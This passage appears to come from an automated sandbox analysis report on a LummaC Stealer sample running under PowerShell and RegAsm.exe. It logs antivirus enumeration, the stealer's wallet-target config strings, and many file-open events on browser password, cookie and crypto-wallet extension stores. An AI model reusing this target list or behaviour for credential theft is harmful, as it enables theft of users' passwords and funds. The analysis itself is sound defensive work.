            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RegAsm.exe, 00000029.00000002.1806244051.0000000001090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wal
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ppdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Versio0
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exod
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
            Source: RegAsm.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: powershell.exe, 0000000D.00000002.1621451700.0000000007DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
